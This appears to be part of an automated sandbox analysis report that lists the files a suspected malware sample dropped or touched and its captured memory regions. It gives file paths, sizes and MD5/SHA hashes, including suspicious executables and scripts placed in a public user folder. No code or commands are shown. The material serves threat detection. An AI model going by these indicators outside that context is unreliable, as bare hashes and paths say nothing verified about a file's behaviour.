                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b925b083-991c-4f08-95e8-8adc785eaf23.dmp
                                              Filesize

                                              826KB

                                              MD5

                                              5391e06291f6ddc6fa4f17707b0c2468

                                              SHA1

                                              7140b12f72cff56cfd1150e0d836d66def4e43c2

                                              SHA256

                                              6b7c12eac14eae58fafac25a3c3152527e89058e240d4cda819c0e75465cb73b

                                              SHA512

                                              6a3bd1f997949c7c2186af2932d472fef4e5ce2c33d5a1cb28ec2ccc71b45aa5e27056a2f2f6a0562e7b6568b21ee1704ca171edd14279d48c7e951f44207447

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ea6dcb31-3884-4c11-93c2-9e4fa5dde98a.dmp
                                              Filesize

                                              838KB

                                              MD5

                                              4069435924ef176369e6eb4203fc71d2

                                              SHA1

                                              8289731699c2bc046a21eeb8f74b71536b37f249

                                              SHA256

                                              030cfdd7788419059a07db17080058bc0540b9f2fe07c61a629d6eb27ae1b39c

                                              SHA512

                                              8427e70122e01d54c7c89acfa0a662aa6038dfbed532035f954e55c0547d4f2fb226595c9547872e32154ee9cf6d052d7318221d2a77328a85cf31d9be1a88a9

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                              Filesize

                                              152B

                                              MD5

                                              7de1bbdc1f9cf1a58ae1de4951ce8cb9

                                              SHA1

                                              010da169e15457c25bd80ef02d76a940c1210301

                                              SHA256

                                              6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

                                              SHA512

                                              e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                              Filesize

                                              152B

                                              MD5

                                              85ba073d7015b6ce7da19235a275f6da

                                              SHA1

                                              a23c8c2125e45a0788bac14423ae1f3eab92cf00

                                              SHA256

                                              5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

                                              SHA512

                                              eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                              Filesize

                                              152B

                                              MD5

                                              e8f41d385d9eae2cb17e31c8cb384c8d

                                              SHA1

                                              39523eeb53498db2e5ef1d15af0542e6ff941a3f

                                              SHA256

                                              4fc0dc632357549fe71e19d3364fcad875db9d9f24e315828e628a85d31ddfd7

                                              SHA512

                                              443f061b05470da13e0dc0462b74e8f516d9259c2fe47d8a098d0a6d03f199d8fc6a29645b2538cf025ff0b7f4bdab704ce537cc0b5a65cd61178dae11ff360e

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                              Filesize

                                              152B

                                              MD5

                                              40c137259fe9d029df467c858347be1d

                                              SHA1

                                              2d30c17c1117569f0b2da8fe745ca370ba2f2ef1

                                              SHA256

                                              19e844ce5d009a9b4a9dc95d1cee6d383c561ad04bb55ee51a221f9dfa969792

                                              SHA512

                                              279591ad16ae06f81a17922c566098f74add4f2bcd4202ced043ec3aa2937d7471dd24dca0e45f3ce2fa25af6eeb69d873850f83e11884920364094b1408ff0c

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                              Filesize

                                              152B

                                              MD5

                                              54c93c315f90e554a8cce2c93320c702

                                              SHA1

                                              c4eaae13af898c227efc256ad366506f745ec941

                                              SHA256

                                              84eef38f2238828aa198ac6de6cb35b309103d0d60de623ed0e77f1710d82119

                                              SHA512

                                              277c7a8e436cfdd62b485d5383ecc37ad0577efebe74ec3efe9b2f80f290abd9ba3540911da5cb60f24df02734e2c02ca2673aa27c168e78e480707ea34fbe6e

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                              Filesize

                                              5KB

                                              MD5

                                              8ff7a8d8e65e3d28eac95dc62ae8f770

                                              SHA1

                                              a3170603c989935cff869426c478affe5f020e1d

                                              SHA256

                                              3924b47dd84b12321f3de80f7d3a1f860cab2917b7ddd8bbbdd5de279a6398a8

                                              SHA512

                                              2b160e5f2665215a5802079046ac79186972b35f2aaeec0b1f582f254fc2541bb5c85e7e66c70e1c5c7975a4cbcaf926045c01eda68f53776fa33afc1ec74ac5

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
                                              Filesize

                                              264KB

                                              MD5

                                              f50f89a0a91564d0b8a211f8921aa7de

                                              SHA1

                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                              SHA256

                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                              SHA512

                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                              Filesize

                                              1KB

                                              MD5

                                              a5c074e56305e761d7cbc42993300e1c

                                              SHA1

                                              39b2e23ba5c56b4f332b3607df056d8df23555bf

                                              SHA256

                                              e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

                                              SHA512

                                              c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dtbrhtjz.fz1.ps1
                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              Download Submit

                                            • C:\Users\Public\Guard.exe
                                              Filesize

                                              872KB

                                              MD5

                                              18ce19b57f43ce0a5af149c96aecc685

                                              SHA1

                                              1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                              SHA256

                                              d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                              SHA512

                                              a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                              Download Submit

                                            • C:\Users\Public\PublicProfile.ps1
                                              Filesize

                                              367B

                                              MD5

                                              65405b53d7734aba2bc7176af3bc406a

                                              SHA1

                                              3edc0caf6f9d845283b33c6362e2bf78b6792d5d

                                              SHA256

                                              d63adba09c8936c086abe866006a0914716f66bbeebf08e20d63ea7ef8dca32b

                                              SHA512

                                              7aeff31ef719dd751a734cb1fafbd58f05c987f959519e43ffecb3f5ddfb64982b5deb8b355021298d4beee07150b1d4bf55d73defc1a173cde526f3abb4a9c2

                                              Download Submit

                                            • C:\Users\Public\Secure.au3
                                              Filesize

                                              4.4MB

                                              MD5

                                              1e388a35beee631c9e12d71e8bc79528

                                              SHA1

                                              77571813bff175b0fc88305f3b6c9e4adf7c9ac6

                                              SHA256

                                              5ca0f2fd860b495bf2651853c1867e83b53643d06f4021c0e878a2682b2348e7

                                              SHA512

                                              21e27f60ab65074f31aa2a6d8bab065a8d95de283dcb3a7fdb632682ba3a610b6b7637af2343ec2673a402ed7d821cfb9e1433ab1636716e3a8fb947b07fceb3

                                              Download Submit

                                            • C:\Users\Public\jsc.exe
                                              Filesize

                                              46KB

                                              MD5

                                              94c8e57a80dfca2482dedb87b93d4fd9

                                              SHA1

                                              5729e6c7d2f5ab760f0093b9d44f8ac0f876a803

                                              SHA256

                                              39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5

                                              SHA512

                                              1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

                                              Download Submit

                                            • memory/2100-49-0x00000000050D0000-0x000000000516C000-memory.dmp

                                              Filesize

                                              624KB

                                              Download

                                            • memory/2100-46-0x0000000000910000-0x0000000000AEC000-memory.dmp

                                              Filesize

                                              1.9MB

                                              Download

                                            • memory/2100-51-0x00000000050B0000-0x00000000050D2000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/2100-50-0x00000000051F0000-0x0000000005390000-memory.dmp

                                              Filesize

                                              1.6MB

                                              Download

                                            • memory/3436-439-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-281-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-135-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-136-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-128-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-75-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-479-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-74-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-56-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-54-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-478-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-471-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-470-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-129-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-52-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-440-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-433-0x0000000000400000-0x0000000000700000-memory.dmp

                                              Filesize

                                              3.0MB

                                              Download

                                            • memory/3436-77-0x0000000019A30000-0x0000000019C8F000-memory.dmp

                                              Filesize

                                              2.4MB

                                              Download

                                            • memory/3656-11-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/3656-12-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/3656-16-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/3656-1-0x000002041D160000-0x000002041D182000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/3656-0-0x00007FFFC1E73000-0x00007FFFC1E75000-memory.dmp

                                              Filesize

                                              8KB

                                              Download

                                            • memory/4816-19-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/4816-20-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/4816-26-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download

                                            • memory/4816-37-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

                                              Filesize

                                              10.8MB

                                              Download